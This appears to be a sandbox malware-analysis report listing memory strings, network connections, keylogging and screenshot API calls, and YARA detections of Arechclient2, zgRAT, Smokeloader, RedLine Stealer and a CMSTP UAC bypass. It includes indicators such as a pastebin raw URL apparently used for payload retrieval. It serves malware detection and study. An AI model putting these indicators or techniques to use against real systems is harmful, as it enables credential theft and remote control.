Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3047078708.00000240F7F30000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://github.com/itfoundry/Poppins)&&&&z
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3046047678.00000240F7DD0000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://github.com/microsoft/ApplicationInsights-dotnet/issues/2560
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3069494325.00000240FBF32000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://indiantypefoundry.com
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3024937302.00000240F5575000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://indiantypefoundry.comd
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2971669712.0000024080001000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://iolo.azure-api.net/ent/v1
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2971669712.0000024080001000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://iolo.comH42652B74-0AD8-4B60-B8FD-69ED38F7666B
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3046047678.00000240F7DD0000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.azure.com//.default
Source: MSBuild.exe, 00000012.00000002.2405611907.0000000002811000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://pastebin.com/raw/z9pYkqPQ
Source: MSBuild.exe, 00000012.00000002.2405611907.0000000002811000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://pastebin.com/raw/z9pYkqPQPOdq8
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2971669712.0000024080247000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://profiler.monitor.azure.com/
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3046047678.00000240F7DD0000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://profiler.monitor.azure.com/l
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2971669712.0000024080247000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://rt.services.visualstudio.com/
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3046047678.00000240F7DD0000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://rt.services.visualstudio.com/l
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3033911115.00000240F78A5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://scripts.sil.4
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3069494325.00000240FBF32000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://scripts.sil.org/OFL
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3047078708.00000240F7F30000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://scripts.sil.org/OFLThis
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3069494325.00000240FBF32000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://scripts.sil.org/OFLX8
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3047078708.00000240F7F30000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://scripts.sil.org/OFLhttps://indiantypefoundry.comNinad
Source: kO1P1YnLst.exe, 00000000.00000003.1830645130.00000000074BA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sectigo.com/CPS0D
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2971669712.0000024080247000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://snapshot.monitor.azure.com/
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3046047678.00000240F7DD0000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://snapshot.monitor.azure.com/&
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2971669712.0000024080796000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.iolo.com/support/solutions/articles/44
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2971669712.0000024080796000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.iolo.com/support/solutions/articles/44001781185
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3047078708.00000240F7F30000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.iolo.com/support/solutions/articles/44001781185?
Source: u5c4.0.exe, 00000001.00000003.2225747415.000000002A7D4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: u5c4.0.exe, 00000001.00000003.2225747415.000000002A7D4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: u5c4.0.exe, 00000001.00000003.1842333897.00000000245BD000.00000004.00000020.00020000.00000000.sdmp, u5c4.0.exe, 00000001.00000002.2496868143.000000000044B000.00000040.00000001.01000000.00000005.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: u5c4.0.exe, 00000001.00000002.2496868143.000000000044B000.00000040.00000001.01000000.00000005.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016.exe
Source: u5c4.0.exe, 00000001.00000003.1842333897.00000000245BD000.00000004.00000020.00020000.00000000.sdmp, u5c4.0.exe, 00000001.00000002.2496868143.000000000044B000.00000040.00000001.01000000.00000005.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: u5c4.0.exe, 00000001.00000002.2496868143.000000000044B000.00000040.00000001.01000000.00000005.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17chost.exe
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp String found in binary or memory: https://taskscheduler.codeplex.com/
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp String found in binary or memory: https://taskscheduler.codeplex.com/H
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2971669712.0000024080001000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://webhooklistenersfunc.azurewebsites.net/api/lookup/constella-dark-web-alerts
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2971669712.0000024080247000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://westus2-2.in.applicationinsights.azure.com/
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2971669712.0000024080001000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2971669712.0000024080247000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://westus2-2.in.applicationinsights.azure.com/;LiveEndpoint=https://westus2.livediagnostics.mon
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2971669712.0000024080247000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://westus2-2.in.applicationinsights.azure.com/v2/track
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2971669712.0000024080247000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://westus2-2.in.applicationinsights.azure.com0p5
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2971669712.0000024080247000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://westus2.livediagnostics.monitor.azure.com/
Source: kO1P1YnLst.exe, 00000000.00000003.1830645130.00000000074BA000.00000004.00000020.00020000.00000000.sdmp, run.exe, 00000002.00000002.1888066079.0000000004506000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2138835462.000000000567B000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2139822498.00000000037AE000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2368098035.00000000057AF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.digicert.com/CPS0
Source: u5c4.0.exe, 00000001.00000002.2500095496.00000000043C6000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000004158000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000002E53000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000003F23000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000003131000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.00000000030FD000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000003067000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000003F3F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000002DF6000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000003223000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.000000000403E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.00000000040E6000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.000000000318F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000004059000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.00000000031C5000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.00000000041E5000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.00000000040CB000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000002D5E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000004173000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000003FCC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: u5c4.0.exe, 00000001.00000002.2500095496.00000000043C6000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000004158000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000002E53000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000003F23000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000003131000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.00000000030FD000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000003067000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000003F3F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000002DF6000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000003223000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.000000000403E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.00000000040E6000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.000000000318F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000004059000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.00000000031C5000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.00000000041E5000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.00000000040CB000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000002D5E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000004173000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000003FCC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2971669712.0000024080001000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.iolo.com/company/legal/eula/
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3047078708.00000240F7F30000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.iolo.com/company/legal/eula/?
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2971669712.0000024080001000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.iolo.com/company/legal/privacy/
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3047078708.00000240F7F30000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.iolo.com/company/legal/privacy/?
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2971669712.0000024080452000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2971669712.0000024080001000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.iolo.com/company/legal/sales-policy/
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3047078708.00000240F7F30000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.iolo.com/company/legal/sales-policy/?
Source: u5c4.0.exe, 00000001.00000002.2496868143.000000000044B000.00000040.00000001.01000000.00000005.sdmp String found in binary or memory: https://www.mozilla.org/about/
Source: u5c4.0.exe, 00000001.00000002.2496868143.000000000044B000.00000040.00000001.01000000.00000005.sdmp String found in binary or memory: https://www.mozilla.org/about/e
Source: u5c4.0.exe, 00000001.00000003.2225747415.000000002A7D4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: u5c4.0.exe, 00000001.00000002.2496868143.000000000044B000.00000040.00000001.01000000.00000005.sdmp String found in binary or memory: https://www.mozilla.org/about/t.exe
Source: u5c4.0.exe, 00000001.00000002.2496868143.000000000044B000.00000040.00000001.01000000.00000005.sdmp String found in binary or memory: https://www.mozilla.org/contribute/
Source: u5c4.0.exe, 00000001.00000003.2225747415.000000002A7D4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: u5c4.0.exe, 00000001.00000002.2496868143.000000000044B000.00000040.00000001.01000000.00000005.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: u5c4.0.exe, 00000001.00000003.2225747415.000000002A7D4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: u5c4.0.exe, 00000001.00000002.2496868143.000000000044B000.00000040.00000001.01000000.00000005.sdmp String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: u5c4.0.exe, 00000001.00000002.2496868143.000000000044B000.00000040.00000001.01000000.00000005.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: u5c4.0.exe, 00000001.00000003.2225747415.000000002A7D4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: u5c4.0.exe, 00000001.00000002.2496868143.000000000044B000.00000040.00000001.01000000.00000005.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/host.exe
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3042888940.00000240F7CA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp String found in binary or memory: https://www.newtonsoft.com/json
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp String found in binary or memory: https://www.newtonsoft.com/jsonschema
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3042888940.00000240F7CA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp String found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
Source: unknown Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49672
Source: unknown Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown HTTPS traffic detected: 169.150.236.100:443 -> 192.168.2.4:49750 version: TLS 1.2
Source: unknown HTTPS traffic detected: 169.150.236.100:443 -> 192.168.2.4:49750 version: TLS 1.2
Contains functionality to record screenshots
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe Code function: 2_2_00DAC8B0 GetClientRect,GetDC,CreateCompatibleBitmap,GetDC,CreateCompatibleDC,BitBlt, 2_2_00DAC8B0
Contains functionality to retrieve information about pressed keystrokes
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe Code function: 2_2_6C7BA5AA GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState, 2_2_6C7BA5AA

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 18.2.MSBuild.exe.820000.0.unpack, type: UNPACKEDPE Matched rule: Detects Arechclient2 RAT Author: ditekSHen
Source: 13.2.run.exe.37b586d.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 3.2.cmd.exe.56c5264.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 3.2.cmd.exe.60900c8.8.unpack, type: UNPACKEDPE Matched rule: Detects Arechclient2 RAT Author: ditekSHen
Source: 3.2.cmd.exe.56c5e64.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 15.2.cmd.exe.57f9264.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 2.2.run.exe.450d86d.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 15.2.cmd.exe.57f9e64.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 15.2.cmd.exe.5dd00c8.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects Arechclient2 RAT Author: ditekSHen
Source: 2.2.run.exe.4551d5b.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 13.2.run.exe.37f9d5b.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 15.2.cmd.exe.57b5976.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 3.2.cmd.exe.60900c8.8.raw.unpack, type: UNPACKEDPE Matched rule: Detects Arechclient2 RAT Author: ditekSHen
Source: 13.2.run.exe.37f915b.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 3.2.cmd.exe.5681976.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 15.2.cmd.exe.5dd00c8.7.unpack, type: UNPACKEDPE Matched rule: Detects Arechclient2 RAT Author: ditekSHen
Source: 2.2.run.exe.455115b.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.240f1a1537d.8.raw.unpack, type: UNPACKEDPE Matched rule: Detects zgRAT Author: ditekSHen
Source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.240f4d4d525.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects zgRAT Author: ditekSHen
Source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.240f1a247a3.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects zgRAT Author: ditekSHen
Source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.240f4d7432f.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects zgRAT Author: ditekSHen
Source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.240f1a34dad.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects zgRAT Author: ditekSHen
Source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.240f4d98739.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects zgRAT Author: ditekSHen
Source: 00000000.00000002.1986302884.0000000005BE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000001.00000002.2500065620.0000000004354000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000001.00000002.2499937738.00000000042D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.1986065052.0000000004255000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: C:\Users\user\AppData\Local\Temp\pasb, type: DROPPED Matched rule: Detects Arechclient2 RAT Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\khjsru, type: DROPPED Matched rule: Detects Arechclient2 RAT Author: ditekSHen
Contains functionality to call native functions
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_6BCC62C0 PR_dtoa,PR_GetCurrentThread,strlen,NtFlushVirtualMemory,PR_GetCurrentThread,memcpy,memcpy, 1_2_6BCC62C0
Detected potential crypto function
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Code function: 0_2_00427880 0_2_00427880
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Code function: 0_2_0040B8AE 0_2_0040B8AE
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Code function: 0_2_0040C191 0_2_0040C191
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Code function: 0_2_004123A0 0_2_004123A0
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Code function: 0_2_0040F441 0_2_0040F441
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Code function: 0_2_0040C44C 0_2_0040C44C
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Code function: 0_2_0042140C 0_2_0042140C
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Code function: 0_2_0040BC20 0_2_0040BC20
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Code function: 0_2_0041BE39 0_2_0041BE39
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Code function: 0_2_0040BECA 0_2_0040BECA
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Code function: 0_2_00408761 0_2_00408761
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Code function: 0_2_0041B722 0_2_0041B722
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Code function: 0_2_0040C7FC 0_2_0040C7FC
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Code function: 0_2_05BEC6B3 0_2_05BEC6B3
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Code function: 0_2_05BEF6A8 0_2_05BEF6A8
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Code function: 0_2_05BEBE87 0_2_05BEBE87
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Code function: 0_2_05BF2607 0_2_05BF2607
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Code function: 0_2_05BFB989 0_2_05BFB989
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Code function: 0_2_05BE89C8 0_2_05BE89C8
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Code function: 0_2_05BEC131 0_2_05BEC131
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Code function: 0_2_05BEC3F8 0_2_05BEC3F8
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Code function: 0_2_05BEBB15 0_2_05BEBB15
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Code function: 0_2_05BECA63 0_2_05BECA63
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_6BBE0BA0 1_2_6BBE0BA0
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_6BC46BE0 1_2_6BC46BE0
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_6BBBEA80 1_2_6BBBEA80
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_6BBF8A30 1_2_6BBF8A30
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_6BBEEA00 1_2_6BBEEA00
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_6BBBCA70 1_2_6BBBCA70
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_6BBD09A0 1_2_6BBD09A0
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_6BBFA9A0 1_2_6BBFA9A0
